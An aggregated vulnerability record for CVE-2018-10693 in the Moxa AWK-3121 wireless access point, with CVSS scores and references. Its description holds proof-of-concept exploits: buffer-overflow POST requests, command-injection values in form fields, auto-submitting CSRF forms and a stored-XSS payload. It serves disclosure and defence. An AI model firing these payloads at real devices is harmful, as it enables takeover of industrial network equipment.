ID

VAR-201906-0783


CVE

CVE-2018-10693


TITLE

Moxa AWK-3121 Device buffer error vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-015588

DESCRIPTION

An issue was discovered on Moxa AWK-3121 1.14 devices. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 A buffer error vulnerability exists in the 'srvName' parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials. ------------------------------------------ [VulnerabilityType Other] HTTP traffic by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 2. It is intended that an administrator can download /systemlog.log (the system log). ------------------------------------------ [Additional Information] POC http://192.168.127.253//systemlog.log ------------------------------------------ [Vulnerability Type] Incorrect Access Control ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 3. The session cookie "Password508" does not have an HttpOnly flag. ------------------------------------------ [VulnerabilityType Other] Missing HttpOnly flag on session cookie ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 4. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0 srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 5. The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well. ------------------------------------------ [VulnerabilityType Other] Open WiFi Connection ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Device ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 6. ------------------------------------------ [Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.) ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 7. The device provides a web interface to allow an administrator to manage the device. ------------------------------------------ [Additional Information] POC to change name of the device <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html <html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Request Forgery (CSRF) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 8. ------------------------------------------ [Additional Information] POC POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333 srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp ------------------------------------------ [VulnerabilityType Other] Command injection in Ping functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK 3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 9. The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. ------------------------------------------ [VulnerabilityType Other] Insecure service Telnet enabled by default ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Telnet daemon ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 10. ------------------------------------------ [Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562 ... 114782935826962 Content-Disposition: form-data; name="iw_privatePass" ;`ping -c 9 192.168.127.103` ## ... 114782935826962 Content-Disposition: form-data; name="bkpath" /wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection" certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex" 0 ... 114782935826962 Content-Disposition: form-data; name="Submit" Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1" test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml <a id="a"<b id="b"hey!</b</a ... 114782935826962-- ------------------------------------------ [VulnerabilityType Other] Command injection in file upload ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 11. ------------------------------------------ [Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.9 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Escalation of Privileges] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 12. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" `ping -c 3 192.168.127.101` ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 13. ------------------------------------------ [Additional Information] POC <html <body <script function submitRequest() { var formData = new FormData(); formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##"); formData.append("iw_storage", "tftp"); formData.append("iw_serverip", "192.168.1.101"); formData.append("bkpath", "/wireless_cert.asp?index=1"); // HTML file input, chosen by user formData.append("certFile1", "test.txt"); // JavaScript file-like object var content = '<a id="a"<b id="b"hey!</b</a'; // the body of the new file... var blob = new Blob([content], { type: "text/xml"}); formData.append("certFile", blob); var request = new XMLHttpRequest(); request.open("POST", "http://192.168.127.253/forms/web_certUpload"); request.send(formData); } </script <form action="#" <input type="submit" value="Submit request" onclick="submitRequest();" / </form </body </html ------------------------------------------ [VulnerabilityType Other] Command injection in web runscript functionality ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley 14. ------------------------------------------ [Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628 ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="XXXX" Content-Type: application/octet-stream ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage" tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip" AAAAAAAAAAAAAAAAAA (etc.) ... 7e21a62f2905ca Content-Disposition: form-data; name="bkpath" /Troubleshooting.asp ... 7e21a62f2905ca-- ------------------------------------------ [Vulnerability Type] Buffer Overflow ------------------------------------------ [Vendor of Product] Moxa ------------------------------------------ [Affected Product Code Base] AWK-3121 - 1.14 ------------------------------------------ [Affected Component] Web Server -- iw_webs (Goahead) ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow ------------------------------------------ [Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm ------------------------------------------ [Discoverer] Samuel Huntley

Trust: 1.89

sources: NVD: CVE-2018-10693 // JVNDB: JVNDB-2018-015588 // VULHUB: VHN-120478 // VULMON: CVE-2018-10693 // PACKETSTORM: 153223

AFFECTED PRODUCTS

vendor:moxamodel:awk-3121scope:eqversion:1.14

Trust: 1.8

sources: JVNDB: JVNDB-2018-015588 // NVD: CVE-2018-10693

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2018-10693
value: HIGH

Trust: 1.0

NVD: CVE-2018-10693
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201906-321
value: HIGH

Trust: 0.6

VULHUB: VHN-120478
value: MEDIUM

Trust: 0.1

VULMON: CVE-2018-10693
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2018-10693
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-120478
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2018-10693
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-120478 // VULMON: CVE-2018-10693 // JVNDB: JVNDB-2018-015588 // CNNVD: CNNVD-201906-321 // NVD: CVE-2018-10693

PROBLEMTYPE DATA

problemtype:CWE-119

Trust: 1.9

sources: VULHUB: VHN-120478 // JVNDB: JVNDB-2018-015588 // NVD: CVE-2018-10693

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201906-321

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-201906-321

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-015588

PATCH

title:AWK-3121 Seriesurl:https://www.moxa.com/en/products/phased-out-products/awk-3121-series

Trust: 0.8

title:Moxa_AWK_1121url:https://github.com/samuelhuntley/Moxa_AWK_1121

Trust: 0.1

sources: VULMON: CVE-2018-10693 // JVNDB: JVNDB-2018-015588

EXTERNAL IDS

db:NVDid:CVE-2018-10693

Trust: 2.7

db:PACKETSTORMid:153223

Trust: 1.9

db:ICS CERTid:ICSA-19-337-02

Trust: 1.4

db:JVNDBid:JVNDB-2018-015588

Trust: 0.8

db:CNNVDid:CNNVD-201906-321

Trust: 0.7

db:AUSCERTid:ESB-2019.4544

Trust: 0.6

db:VULHUBid:VHN-120478

Trust: 0.1

db:VULMONid:CVE-2018-10693

Trust: 0.1

sources: VULHUB: VHN-120478 // VULMON: CVE-2018-10693 // JVNDB: JVNDB-2018-015588 // PACKETSTORM: 153223 // CNNVD: CNNVD-201906-321 // NVD: CVE-2018-10693

REFERENCES

url:https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121

Trust: 2.6

url:https://seclists.org/bugtraq/2019/jun/8

Trust: 1.8

url:http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2018-10693

Trust: 1.5

url:https://www.us-cert.gov/ics/advisories/icsa-19-337-02

Trust: 1.4

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10693

Trust: 0.8

url:https://www.auscert.org.au/bulletins/esb-2019.4544/

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/119.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://github.com/samuelhuntley/moxa_awk_1121

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10702

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10699

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10701

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10698

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10695

Trust: 0.1

url:http://192.168.127.253/forms/websetmainrestart"

Trust: 0.1

url:https://www.moxa.com/event/tech/2008/awk-3121/index.htm

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10696

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10703

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10690

Trust: 0.1

url:http://192.168.127.253/forms/iw_websetparameters"

Trust: 0.1

url:http://192.168.127.253/forms/web_certupload");

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10694

Trust: 0.1

url:http://192.168.127.253//systemlog.log

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10691

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10697

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10700

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2018-10692

Trust: 0.1

sources: VULHUB: VHN-120478 // VULMON: CVE-2018-10693 // JVNDB: JVNDB-2018-015588 // PACKETSTORM: 153223 // CNNVD: CNNVD-201906-321 // NVD: CVE-2018-10693

CREDITS

Samuel Huntley

Trust: 0.1

sources: PACKETSTORM: 153223

SOURCES

db:VULHUBid:VHN-120478
db:VULMONid:CVE-2018-10693
db:JVNDBid:JVNDB-2018-015588
db:PACKETSTORMid:153223
db:CNNVDid:CNNVD-201906-321
db:NVDid:CVE-2018-10693

LAST UPDATE DATE

2024-11-23T21:37:12.718000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-120478date:2019-06-10T00:00:00
db:VULMONid:CVE-2018-10693date:2019-06-10T00:00:00
db:JVNDBid:JVNDB-2018-015588date:2019-12-04T00:00:00
db:CNNVDid:CNNVD-201906-321date:2019-12-04T00:00:00
db:NVDid:CVE-2018-10693date:2024-11-21T03:41:51.817

SOURCES RELEASE DATE

db:VULHUBid:VHN-120478date:2019-06-07T00:00:00
db:VULMONid:CVE-2018-10693date:2019-06-07T00:00:00
db:JVNDBid:JVNDB-2018-015588date:2019-06-19T00:00:00
db:PACKETSTORMid:153223date:2019-06-07T22:22:22
db:CNNVDid:CNNVD-201906-321date:2019-06-07T00:00:00
db:NVDid:CVE-2018-10693date:2019-06-07T20:29:00.373